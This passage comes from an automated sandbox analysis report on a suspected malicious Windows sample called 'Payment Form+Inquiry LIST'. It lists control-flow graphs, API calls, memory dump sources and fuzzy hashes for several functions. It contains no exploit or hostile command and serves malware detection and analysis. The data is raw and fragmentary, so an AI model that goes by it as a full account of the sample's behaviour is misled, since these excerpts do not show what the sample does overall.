                            control_flow_graph 386 7ff6e8283480-7ff6e82834bb 387 7ff6e82834bd-7ff6e82834e2 call 7ff6e8262140 386->387 388 7ff6e8283506-7ff6e8283514 386->388 392 7ff6e82834e7-7ff6e82834ff 387->392 390 7ff6e8283569 388->390 391 7ff6e8283516-7ff6e8283519 388->391 394 7ff6e8283570-7ff6e8283577 390->394 391->390 393 7ff6e828351b-7ff6e8283522 391->393 392->388 395 7ff6e8283524-7ff6e8283535 393->395 396 7ff6e8283560-7ff6e8283567 393->396 397 7ff6e8283579-7ff6e828357c 394->397 398 7ff6e82835b7-7ff6e82835c9 394->398 401 7ff6e8283537-7ff6e8283544 395->401 402 7ff6e8283546-7ff6e828355e 395->402 396->394 397->398 403 7ff6e828357e-7ff6e8283580 397->403 399 7ff6e82836ba-7ff6e82836c2 398->399 400 7ff6e82835cf-7ff6e82835d1 398->400 404 7ff6e82836c8-7ff6e82836cb 399->404 405 7ff6e8283817-7ff6e8283826 399->405 406 7ff6e82835dc-7ff6e82835f1 400->406 407 7ff6e82835d3-7ff6e82835d7 400->407 401->394 402->394 408 7ff6e82835a4 403->408 409 7ff6e8283582-7ff6e8283589 403->409 404->405 411 7ff6e82836d1-7ff6e8283712 call 7ff6e827f0e0 404->411 414 7ff6e8283839-7ff6e8283840 405->414 415 7ff6e8283828-7ff6e8283833 405->415 406->399 413 7ff6e82835f7-7ff6e828360c 406->413 412 7ff6e828369f-7ff6e82836b3 407->412 410 7ff6e82835a8-7ff6e82835b1 408->410 416 7ff6e828358b-7ff6e828358d 409->416 417 7ff6e828359e-7ff6e82835a2 409->417 410->398 432 7ff6e82837dc-7ff6e82837e5 411->432 433 7ff6e8283718-7ff6e8283729 411->433 412->399 419 7ff6e8283617-7ff6e828362f 413->419 420 7ff6e828360e-7ff6e8283612 413->420 421 7ff6e8283859-7ff6e828385c 414->421 422 7ff6e8283842-7ff6e8283854 414->422 415->414 416->398 423 7ff6e828358f-7ff6e828359c 416->423 417->410 425 7ff6e8283638-7ff6e828364c 419->425 426 7ff6e8283631-7ff6e8283636 419->426 420->412 428 7ff6e8283a47 421->428 429 7ff6e8283862-7ff6e8283872 421->429 427 7ff6e8283b0f-7ff6e8283b17 422->427 423->398 436 7ff6e8283650-7ff6e8283665 425->436 426->436 434 7ff6e8283b1b-7ff6e8283b29 427->434 435 7ff6e8283a4f-7ff6e8283a52 428->435 430 7ff6e82838ca-7ff6e82838cd 429->430 431 7ff6e8283874-7ff6e828387e 429->431 430->435 438 7ff6e82838d3-7ff6e82838db 430->438 431->435 437 7ff6e8283884-7ff6e828388b 431->437 439 7ff6e828380c-7ff6e8283811 432->439 440 7ff6e82837e7-7ff6e8283803 432->440 441 7ff6e828372b-7ff6e8283730 433->441 442 7ff6e8283732-7ff6e8283746 433->442 443 7ff6e8283a58-7ff6e8283a5b 435->443 444 7ff6e8283afe-7ff6e8283b01 435->444 445 7ff6e828367d-7ff6e8283699 436->445 446 7ff6e8283667-7ff6e828366e 436->446 437->430 448 7ff6e828388d-7ff6e82838b0 437->448 438->428 450 7ff6e82838e1-7ff6e82838e8 438->450 439->405 440->439 451 7ff6e8283805 440->451 452 7ff6e828374a-7ff6e8283750 441->452 442->452 443->434 453 7ff6e8283a61-7ff6e8283a6a 443->453 444->434 449 7ff6e8283b03-7ff6e8283b06 444->449 445->399 447 7ff6e828369b 445->447 446->445 454 7ff6e8283670-7ff6e828367a 446->454 447->412 455 7ff6e8283903-7ff6e828390e 448->455 456 7ff6e82838b2-7ff6e82838b5 448->456 449->427 457 7ff6e8283b08 449->457 458 7ff6e82838ea-7ff6e82838fe 450->458 459 7ff6e828394e-7ff6e8283955 450->459 451->439 460 7ff6e8283759-7ff6e828376d 452->460 461 7ff6e8283752-7ff6e8283757 452->461 453->434 462 7ff6e8283a70-7ff6e8283a7a 453->462 454->445 455->430 467 7ff6e8283910-7ff6e828391a 455->467 465 7ff6e82838b7-7ff6e82838c1 456->465 466 7ff6e82838c3 456->466 457->427 458->449 463 7ff6e828395b-7ff6e8283962 459->463 464 7ff6e8283a33-7ff6e8283a42 459->464 468 7ff6e8283771-7ff6e8283789 460->468 461->468 462->434 469 7ff6e8283a80-7ff6e8283a8d 462->469 470 7ff6e8283968-7ff6e8283980 463->470 471 7ff6e82839f5-7ff6e82839ff 463->471 464->449 465->455 465->466 466->430 472 7ff6e828391c 467->472 473 7ff6e828391f-7ff6e828392e 467->473 474 7ff6e828378b-7ff6e8283790 468->474 475 7ff6e8283792-7ff6e82837a3 468->475 476 7ff6e8283a96-7ff6e8283aa7 469->476 477 7ff6e8283a8f-7ff6e8283a94 469->477 470->428 480 7ff6e8283986-7ff6e828398e 470->480 471->428 481 7ff6e8283a01-7ff6e8283a27 471->481 472->473 473->430 482 7ff6e8283930-7ff6e8283949 473->482 478 7ff6e82837a7-7ff6e82837ba call 7ff6e827f0e0 474->478 475->478 479 7ff6e8283aab-7ff6e8283ab1 476->479 477->479 490 7ff6e82837bc-7ff6e82837c1 478->490 491 7ff6e82837c3-7ff6e82837d4 478->491 484 7ff6e8283aba-7ff6e8283acb 479->484 485 7ff6e8283ab3-7ff6e8283ab8 479->485 480->428 486 7ff6e8283994-7ff6e82839f0 480->486 481->428 487 7ff6e8283a29 481->487 482->449 489 7ff6e8283acf-7ff6e8283ae2 484->489 485->489 486->449 487->464 489->434 492 7ff6e8283ae4-7ff6e8283afd 489->492 493 7ff6e82837d8 490->493 491->493 493->432
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: CurrentProcess
                            • String ID: P=*
                            • API String ID: 2050909247-581859018
                            • Opcode ID: e78b3909f8ea25d473e67f9112f21475dc84ab5c971eb88372a6baac30c71a1f
                            • Instruction ID: 41482f64ed56a43d11eb3ade91000c1de7f0f0b86d84c180a32dc66f0db934e9
                            • Opcode Fuzzy Hash: e78b3909f8ea25d473e67f9112f21475dc84ab5c971eb88372a6baac30c71a1f
                            • Instruction Fuzzy Hash: E5029EA3E0D646CAFA15CB35AA4473876A1EF54790F058635C40DD3260EF3EB499C78E
                            Function 00007FF6E8281D80 Relevance: .3, Instructions: 316COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a6bad46461646456b0845c2c71dcf6c7b8a409867b5bf0591358b8ce704b71c6
                            • Instruction ID: 9133a6580ccccb5291bf03d291462cf977e2999b23f67ec31b3c39f8f313cece
                            • Opcode Fuzzy Hash: a6bad46461646456b0845c2c71dcf6c7b8a409867b5bf0591358b8ce704b71c6
                            • Instruction Fuzzy Hash: 7AF16163D1CB47CAFA02DB34AA51375A261EFA5380F558335D40DD22A2FF2E7495838E
                            Function 00007FF6E8262320 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 96COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                            • String ID: @$@$@
                            • API String ID: 2645093340-1177533131
                            • Opcode ID: 95225103daefa8726f68f1ab5db984df9ad458603156aeec33b16addcc65e5e3
                            • Instruction ID: a49b69a3f65f94cd1b533467eaf7823eef4de78a97b4c4cae27f54cbf3d549a0
                            • Opcode Fuzzy Hash: 95225103daefa8726f68f1ab5db984df9ad458603156aeec33b16addcc65e5e3
                            • Instruction Fuzzy Hash: C8416332619AC18AEA718F21E5443A9B360FB84B60F484275DFAD93AD8CF3DD444C749
                            Function 00007FF6E825CCC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF6E8257D0F,?,?,?,?,?,?,00007FF6E8251C00), ref: 00007FF6E825CCCB
                              • Part of subcall function 00007FF6E8262760: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E826276F
                              • Part of subcall function 00007FF6E8262760: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627AD
                              • Part of subcall function 00007FF6E8262760: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627D9
                              • Part of subcall function 00007FF6E8262760: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627EA
                              • Part of subcall function 00007FF6E8262760: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627F9
                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF6E8257D0F,?,?,?,?,?,?,00007FF6E8251C00), ref: 00007FF6E825CD3D
                            • GetProcessAffinityMask.KERNEL32 ref: 00007FF6E825CD50
                            • QueryInformationJobObject.KERNEL32 ref: 00007FF6E825CD9E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
                            • String ID: PROCESSOR_COUNT
                            • API String ID: 1701933505-4048346908
                            • Opcode ID: c890785a539d5afcbefa23d8d6d40b219dc5395e8b11610044fd4b18a0a910d1
                            • Instruction ID: 6b4299a971e02640766161a259f8780ffea3c4aac6dd72c5fc096e056cfc1851
                            • Opcode Fuzzy Hash: c890785a539d5afcbefa23d8d6d40b219dc5395e8b11610044fd4b18a0a910d1
                            • Instruction Fuzzy Hash: 3F318E73A59B428AEA249B60D6403B967A1EF40754F440031DA4DC76D9EE2EE408D78F
                            Function 00007FF6E8253200 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF6E82532F6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: ExceptionFailFastRaise$Sleep
                            • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                            • API String ID: 3706814929-926682358
                            • Opcode ID: 509191a938dc5721182cf2216d0e9699bb1c5f14f2451f1e6e328690f9fb4e79
                            • Instruction ID: 4ea60efafe8d8db364ffc861a2f34b61c58d2ea1e8d9668d24ce4b366f301936
                            • Opcode Fuzzy Hash: 509191a938dc5721182cf2216d0e9699bb1c5f14f2451f1e6e328690f9fb4e79
                            • Instruction Fuzzy Hash: 4F414F33A59B428AEB519B25E55437923E0EB05784F04903AC94DC62A4DF3FE859C38F
                            Function 00007FF6E825CF20 Relevance: 6.0, APIs: 4, Instructions: 26threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
                            • String ID:
                            • API String ID: 2150560229-0
                            • Opcode ID: 9511c21b225c2505e3656d620379201a906c5cfbeca7072923825b3915600e7d
                            • Instruction ID: dfb7d9e921dc192e9a4b9e09d39491f6b96a2c4fbe4d562823ff36a9730e12b0
                            • Opcode Fuzzy Hash: 9511c21b225c2505e3656d620379201a906c5cfbeca7072923825b3915600e7d
                            • Instruction Fuzzy Hash: D5E0E5AAA0470182FF149B71A8183755351AFA8B91F4C0074CD5E4A3E0EE3D8185450C
                            Function 00007FF6E8262140 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 175 7ff6e8262140-7ff6e8262171 176 7ff6e8262177-7ff6e8262192 GetCurrentProcess call 7ff6e82b08c9 175->176 177 7ff6e826222f-7ff6e826224c GlobalMemoryStatusEx 175->177 176->177 188 7ff6e8262198-7ff6e82621a0 176->188 179 7ff6e82622d2-7ff6e82622d5 177->179 180 7ff6e8262252-7ff6e8262255 177->180 181 7ff6e82622d7-7ff6e82622db 179->181 182 7ff6e82622de-7ff6e82622e1 179->182 184 7ff6e8262257-7ff6e8262262 180->184 185 7ff6e82622c1-7ff6e82622c4 180->185 181->182 186 7ff6e82622eb-7ff6e82622ee 182->186 187 7ff6e82622e3-7ff6e82622e8 182->187 189 7ff6e826226b-7ff6e826227c 184->189 190 7ff6e8262264-7ff6e8262269 184->190 191 7ff6e82622c6 185->191 192 7ff6e82622c9-7ff6e82622cc 185->192 193 7ff6e82622f8-7ff6e826231b call 7ff6e82b0c30 186->193 195 7ff6e82622f0 186->195 187->186 196 7ff6e826220a-7ff6e826220f 188->196 197 7ff6e82621a2-7ff6e82621a8 188->197 198 7ff6e8262280-7ff6e8262291 189->198 190->198 191->192 192->193 194 7ff6e82622ce-7ff6e82622d0 192->194 201 7ff6e82622f5 194->201 195->201 199 7ff6e8262221-7ff6e8262224 196->199 200 7ff6e8262211-7ff6e8262214 196->200 202 7ff6e82621aa-7ff6e82621af 197->202 203 7ff6e82621b1-7ff6e82621c5 197->203 205 7ff6e826229a-7ff6e82622ae 198->205 206 7ff6e8262293-7ff6e8262298 198->206 199->193 209 7ff6e826222a 199->209 207 7ff6e826221b-7ff6e826221e 200->207 208 7ff6e8262216-7ff6e8262219 200->208 201->193 210 7ff6e82621c9-7ff6e82621da 202->210 203->210 212 7ff6e82622b2-7ff6e82622be 205->212 206->212 207->199 208->199 209->201 213 7ff6e82621dc-7ff6e82621e1 210->213 214 7ff6e82621e3-7ff6e82621f7 210->214 212->185 215 7ff6e82621fb-7ff6e8262207 213->215 214->215 215->196
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: CurrentGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3261791682-2766056989
                            • Opcode ID: a7052b65163810799a708a6fe7c5f255f8a0101645a1a73b8d3173c2a00ec693
                            • Instruction ID: 77e35be5148409703958c275865809146fa293e23a52874ec6883755e03e3378
                            • Opcode Fuzzy Hash: a7052b65163810799a708a6fe7c5f255f8a0101645a1a73b8d3173c2a00ec693
                            • Instruction Fuzzy Hash: 37411823B29B464EEA56CA3692103399252EF59BC0F18C732DD1DB2744FF3EE4819649
                            Function 00007FF6E826899B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Count64Tick
                            • String ID: D)
                            • API String ID: 1927824332-848725745
                            • Opcode ID: 7904b99c7dc68c0cae2b5c7310acba6e0ea9d0dd2db6736425592f235cfd3e95
                            • Instruction ID: 9881c88432e505cea3b9a3b85cd0a25f86be4f4d43f8ce0df61aa6118a60d8ac
                            • Opcode Fuzzy Hash: 7904b99c7dc68c0cae2b5c7310acba6e0ea9d0dd2db6736425592f235cfd3e95
                            • Instruction Fuzzy Hash: C0415723E2D752CEEA609B31AA4437962A1EF00784F144532CD0DE36A5DE3FE449938F
                            Function 00007FF6E82629E0 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF6E8266538,?,?,0000000B,00007FF6E8265400,?,?,00000000,00007FF6E825F7C1), ref: 00007FF6E8262A07
                            • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF6E8266538,?,?,0000000B,00007FF6E8265400,?,?,00000000,00007FF6E825F7C1), ref: 00007FF6E8262A27
                            • VirtualAllocExNuma.KERNEL32 ref: 00007FF6E8262A48
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: AllocVirtual$CurrentNumaProcess
                            • String ID:
                            • API String ID: 647533253-0
                            • Opcode ID: 30b1441a2bea7775d7c955215729cdf2e5a892d16db3f8955b52174439e52f72
                            • Instruction ID: 079e1cb19d824eced01c64e537c39a283e974ed02c81a982cffc046d095bbf48
                            • Opcode Fuzzy Hash: 30b1441a2bea7775d7c955215729cdf2e5a892d16db3f8955b52174439e52f72
                            • Instruction Fuzzy Hash: 05F0AF72B0869186EB208B26F500319A760BB59FD4F080178EF9C67B98DF3EC581CB08
                            Function 00007FF6E82629A0 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 9b4b0e60d32251690daea8b7a5fffc301cfc6528cc5a9902456aa392ed653aa5
                            • Instruction ID: 0e51c905714136ebd037936317166f8fc8c62572d83754a86aa61216b2fe2f2d
                            • Opcode Fuzzy Hash: 9b4b0e60d32251690daea8b7a5fffc301cfc6528cc5a9902456aa392ed653aa5
                            • Instruction Fuzzy Hash: 6AE0CD35F16601C6FF58973268417141351AF99B00FC4C078C40D977D0DD2F615ADB49
                            Function 00007FF6E82E1A90 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF6E82E1950,?,?,00000030), ref: 00007FF6E82E1B09
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Initialize
                            • String ID:
                            • API String ID: 2538663250-0
                            • Opcode ID: a397c68d9d6042325afacf9ff6cce955754c6f6ab0659fade62fac1c0edc7dc7
                            • Instruction ID: e0fbeb3dd02e394d7e7a4baa582dd519fbeda2d2f71da864f8aaaba4f551b8d5
                            • Opcode Fuzzy Hash: a397c68d9d6042325afacf9ff6cce955754c6f6ab0659fade62fac1c0edc7dc7
                            • Instruction Fuzzy Hash: 8931F223E086169DFB129771EA113BD62546F40780F444136DD0DDB79AEE3EE881838F
                            Function 00007FF6E82526B0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
